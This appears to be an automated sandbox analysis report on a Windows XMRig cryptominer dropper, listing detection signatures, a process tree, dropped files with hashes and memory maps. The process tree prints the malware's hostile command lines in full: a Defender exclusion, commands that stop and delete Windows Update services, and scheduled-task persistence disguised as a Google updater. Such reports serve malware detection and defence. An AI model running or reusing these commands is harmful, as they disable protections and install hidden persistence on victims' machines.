Analysis
-
max time kernel
300s -
max time network
299s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
-
submitted
25-09-2022 22:17
General
-
Target
1ed19ad26e2f46770568a3fa1e08eba161c7e9b50900179271c2962aa67aa0c4.exe
-
Size
345KB
-
MD5
58d95faa5d76221e6d241dbcc5a50db9
-
SHA1
d268271eb2f16cc4ada2948b6952ccde926fa94a
-
SHA256
1ed19ad26e2f46770568a3fa1e08eba161c7e9b50900179271c2962aa67aa0c4
-
SHA512
1b07c493dc7a6e8bbbf76fb3cac10f5100518799d86ff66063a88e210c69f0f23422274d6c5516eb4ca8028ca159870d41801e3c5b3b70950e752d5e3d1d3903
-
SSDEEP
6144:i+WVyOeJwU4oJ9ZETtTMgxM+cJohaz4YEGjZvo3e+bBDDOXZM7zCc:QIqUj9ZtwMhJoZYEGjpo3e+bB+0
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
-
XMRig Miner payload 2 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 4 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Themida packer 16 IoCs
Detects Themida, an advanced Windows software protection system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\1ed19ad26e2f46770568a3fa1e08eba161c7e9b50900179271c2962aa67aa0c4.exe"C:\Users\Admin\AppData\Local\Temp\1ed19ad26e2f46770568a3fa1e08eba161c7e9b50900179271c2962aa67aa0c4.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 04⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 05⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#khtnr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC5⤵
-
C:\Users\Admin\AppData\Local\Temp\setup1.exe"C:\Users\Admin\AppData\Local\Temp\setup1.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"4⤵
- Creates scheduled task(s)
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#kfqirnwiw#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe lhmcarocyjvzk2⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"3⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe jftlneyiewlaxjvq GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/8HOYVji2aTn31s7dz3/WlCN+UmM7HFUgStV0krKswFnOvNVFJHtjMrdLvilnrbVN4TalQD/4emuEzW66JneW1mVBd6IrnBFdAaSbxamnHt0v75gn2+2heHSc2pqg9laV2⤵
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeC:\Users\Admin\AppData\Local\cache\MoUSO.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD55d82c9348a2fcc2cae7d4c45a9e4d32b
SHA18465f1a3cda67e025acaf5d63581f098d7abc9d6
SHA256d4c4d38b8cd1ebbcacd66e0f28093a66f27a071203f2ecd7b52044b2660cbf00
SHA512e8558fcdef014fe54d77081c1605999f52b125d64c68f36286b73dcb2782aa72c500ee9f6b732539d954a597e9188db9c67a151396d1f62d4aef0db46c430425
-
C:\Program Files\Google\Chrome\updater.exeFilesize
7.0MB
MD55d82c9348a2fcc2cae7d4c45a9e4d32b
SHA18465f1a3cda67e025acaf5d63581f098d7abc9d6
SHA256d4c4d38b8cd1ebbcacd66e0f28093a66f27a071203f2ecd7b52044b2660cbf00
SHA512e8558fcdef014fe54d77081c1605999f52b125d64c68f36286b73dcb2782aa72c500ee9f6b732539d954a597e9188db9c67a151396d1f62d4aef0db46c430425
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD58592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58b6071f47e9fe698e25c140c6480bd31
SHA1dacaf5ee234ae9e42966850a8f787d3883c91a3a
SHA25629f9a2baf030468f29307f2c6f35706966506c665041dc45469aa22b0c5f7bfe
SHA5122229870cc4ae34f7c6e50eb59148b64395aa4c0d303e64e8ae7dafd2cf48312f7f3e0a840bfeb976f8bc0133d5db0b3c591b743e537b1dbc521b900d682b95e3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56a97d20c09a2817764a550ac5ee02d45
SHA126197cff47b042d51342b8a98b37bea6932f838c
SHA25678279286c680830d78a8bcd3f0470fb0e1ea21d6a7bdcbc3bbe22c0e1cd5a05b
SHA512feca5b91a800d378ef85734399a960e624178edde82ddb645e33f3ee73fdb0808c5121a6e3dd4c0741c4b2209207c69a2f4b8af449aff98a8611aa041c2f4f19
-
C:\Users\Admin\AppData\Local\Temp\setup.exeFilesize
7.0MB
MD5607f90f24c616bdfe0ad6c2312894353
SHA1439e61345e28575f1023103217a9addadbb9a383
SHA25679a757a286e0c632d66ca37af103e456c93b7654f8d2eb9da51ad99c15a71fc2
SHA512acaf14481ab75d07ec4cd857e210f652e5de63e5335d1c1b64b1f358e8fa89c9f5d0d267fb3d962a08bbb651633f73ef23d3a74511ffa13216ae5ba7d839a159
-
C:\Users\Admin\AppData\Local\Temp\setup.exeFilesize
7.0MB
MD5607f90f24c616bdfe0ad6c2312894353
SHA1439e61345e28575f1023103217a9addadbb9a383
SHA25679a757a286e0c632d66ca37af103e456c93b7654f8d2eb9da51ad99c15a71fc2
SHA512acaf14481ab75d07ec4cd857e210f652e5de63e5335d1c1b64b1f358e8fa89c9f5d0d267fb3d962a08bbb651633f73ef23d3a74511ffa13216ae5ba7d839a159
-
C:\Users\Admin\AppData\Local\Temp\setup1.exeFilesize
1.3MB
MD53afac3d5b79c3dd40e77cc6c244129e0
SHA160ca75e5db4275e4a0b9a0d4fc4a9191d1cf55e2
SHA256035a478e8b2e17832fe01a3442629cb0402dc18242123eabce48f17ef2700bca
SHA512e6e4b00719eae37c6fece904e692daa35780ae7291ed3f7d4b1c9a307e5d9a8daee7749128f1f584f498b4ecfc79fd19c4b7b36d3ca808f88f0c4f18bfbe534f
-
C:\Users\Admin\AppData\Local\Temp\setup1.exeFilesize
1.3MB
MD53afac3d5b79c3dd40e77cc6c244129e0
SHA160ca75e5db4275e4a0b9a0d4fc4a9191d1cf55e2
SHA256035a478e8b2e17832fe01a3442629cb0402dc18242123eabce48f17ef2700bca
SHA512e6e4b00719eae37c6fece904e692daa35780ae7291ed3f7d4b1c9a307e5d9a8daee7749128f1f584f498b4ecfc79fd19c4b7b36d3ca808f88f0c4f18bfbe534f
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeFilesize
1.3MB
MD53afac3d5b79c3dd40e77cc6c244129e0
SHA160ca75e5db4275e4a0b9a0d4fc4a9191d1cf55e2
SHA256035a478e8b2e17832fe01a3442629cb0402dc18242123eabce48f17ef2700bca
SHA512e6e4b00719eae37c6fece904e692daa35780ae7291ed3f7d4b1c9a307e5d9a8daee7749128f1f584f498b4ecfc79fd19c4b7b36d3ca808f88f0c4f18bfbe534f
-
C:\Users\Admin\AppData\Local\cache\MoUSO.exeFilesize
1.3MB
MD53afac3d5b79c3dd40e77cc6c244129e0
SHA160ca75e5db4275e4a0b9a0d4fc4a9191d1cf55e2
SHA256035a478e8b2e17832fe01a3442629cb0402dc18242123eabce48f17ef2700bca
SHA512e6e4b00719eae37c6fece904e692daa35780ae7291ed3f7d4b1c9a307e5d9a8daee7749128f1f584f498b4ecfc79fd19c4b7b36d3ca808f88f0c4f18bfbe534f
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5573d77d4e77a445f5db769812a0be865
SHA17473d15ef2d3c6894edefd472f411c8e3209a99c
SHA2565ec3f268845a50e309ae0d80bcee4f4dd4cd1b279ab1e64b523a057c11074f1c
SHA512af2422a9790a91cdcbe39e6ef6d17899c2cbd4159b1b71ac56f633015068d3afc678fcef34892575bf59bdf7d5914ec6070864940d44130263fe84e28abba2dc
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5631f4b3792b263fdda6b265e93be4747
SHA11d6916097d419198bfdf78530d59d0d9f3e12d45
SHA2564e68d2d067c5680a2e55853ac58b16f199b09f1b9e5f2174605fff18da828976
SHA512e0280041c4ca63971ab2524f25d2047820f031c1b4aeb6021a3367297045ddf6616ffccafb54630eb07fd154571d844329ebcc34d6ce64834cb77cba373e4fbe
-
C:\Windows\system32\drivers\etc\hostsFilesize
2KB
MD519e76c6146ff6a7d289f5335e66b6b6a
SHA1bc5f50b062e439397b69ec6ddee7e07ad1b5d19b
SHA25627e45dae0e02f106023241a4e9f5abb67f5ed19f024b6ad6f92ee9da7483ccad
SHA512f5fc87528f55c02b75b3038965a2ee1f6a726686c7fe10147bf53aba283e951cb0391ba809e79b018ffc7bbba93e66a7b76ccee9fe1e89e9985576b271521d14
-
memory/208-298-0x0000000000000000-mapping.dmp
-
memory/428-559-0x0000000000000000-mapping.dmp
-
memory/792-828-0x0000021C9E459000-0x0000021C9E45F000-memory.dmpFilesize
24KB
-
memory/792-546-0x0000000000000000-mapping.dmp
-
memory/792-797-0x0000021CA13B0000-0x0000021CA13CC000-memory.dmpFilesize
112KB
-
memory/864-284-0x0000000000000000-mapping.dmp
-
memory/1068-572-0x0000000000000000-mapping.dmp
-
memory/1084-574-0x0000000000000000-mapping.dmp
-
memory/1124-292-0x0000000000000000-mapping.dmp
-
memory/1196-287-0x0000000000000000-mapping.dmp
-
memory/1232-547-0x0000000000000000-mapping.dmp
-
memory/1236-575-0x0000000000000000-mapping.dmp
-
memory/1508-555-0x0000000000000000-mapping.dmp
-
memory/1516-291-0x0000000000000000-mapping.dmp
-
memory/1592-845-0x00007FF75F350000-0x00007FF75FB44000-memory.dmpFilesize
8.0MB
-
memory/1592-842-0x00007FF75F350000-0x00007FF75FB44000-memory.dmpFilesize
8.0MB
-
memory/1592-838-0x00007FF75FB425D0-mapping.dmp
-
memory/1648-306-0x0000000000000000-mapping.dmp
-
memory/1672-544-0x0000000000000000-mapping.dmp
-
memory/1784-573-0x0000000000000000-mapping.dmp
-
memory/1932-400-0x000001F8F9C70000-0x000001F8F9C8C000-memory.dmpFilesize
112KB
-
memory/1932-451-0x000001F8F9C90000-0x000001F8F9C9A000-memory.dmpFilesize
40KB
-
memory/1932-356-0x0000000000000000-mapping.dmp
-
memory/1932-409-0x000001F8FA850000-0x000001F8FA909000-memory.dmpFilesize
740KB
-
memory/2100-157-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-187-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-160-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-161-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-162-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-163-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-164-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-165-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-166-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-167-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-168-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-169-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-170-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-171-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-172-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-173-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-174-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-175-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-176-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-177-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-178-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-179-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-180-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-182-0x00000000010B0000-0x0000000001422000-memory.dmpFilesize
3.4MB
-
memory/2100-181-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-183-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-184-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-185-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-186-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-150-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-188-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-189-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-190-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-191-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-193-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-192-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-194-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-195-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-151-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-135-0x0000000000000000-mapping.dmp
-
memory/2100-137-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-139-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-252-0x00000000010B0000-0x0000000001422000-memory.dmpFilesize
3.4MB
-
memory/2100-140-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-141-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-142-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-158-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-144-0x00000000010B0000-0x0000000001422000-memory.dmpFilesize
3.4MB
-
memory/2100-143-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-146-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-156-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-155-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-147-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-154-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-153-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-148-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-152-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-149-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2100-159-0x0000000077BF0000-0x0000000077D7E000-memory.dmpFilesize
1.6MB
-
memory/2204-560-0x0000000000000000-mapping.dmp
-
memory/2212-302-0x0000000000000000-mapping.dmp
-
memory/2212-563-0x0000000000000000-mapping.dmp
-
memory/2320-301-0x0000000000000000-mapping.dmp
-
memory/2408-325-0x0000000000000000-mapping.dmp
-
memory/3176-564-0x0000000000000000-mapping.dmp
-
memory/3284-295-0x0000000000000000-mapping.dmp
-
memory/3292-556-0x0000000000000000-mapping.dmp
-
memory/3416-212-0x0000027231510000-0x0000027231532000-memory.dmpFilesize
136KB
-
memory/3416-215-0x00000272316C0000-0x0000027231736000-memory.dmpFilesize
472KB
-
memory/3416-197-0x0000000000000000-mapping.dmp
-
memory/3508-835-0x0000000000000000-mapping.dmp
-
memory/3708-122-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/3708-123-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
memory/3708-138-0x0000000140000000-0x0000000140023000-memory.dmpFilesize
140KB
-
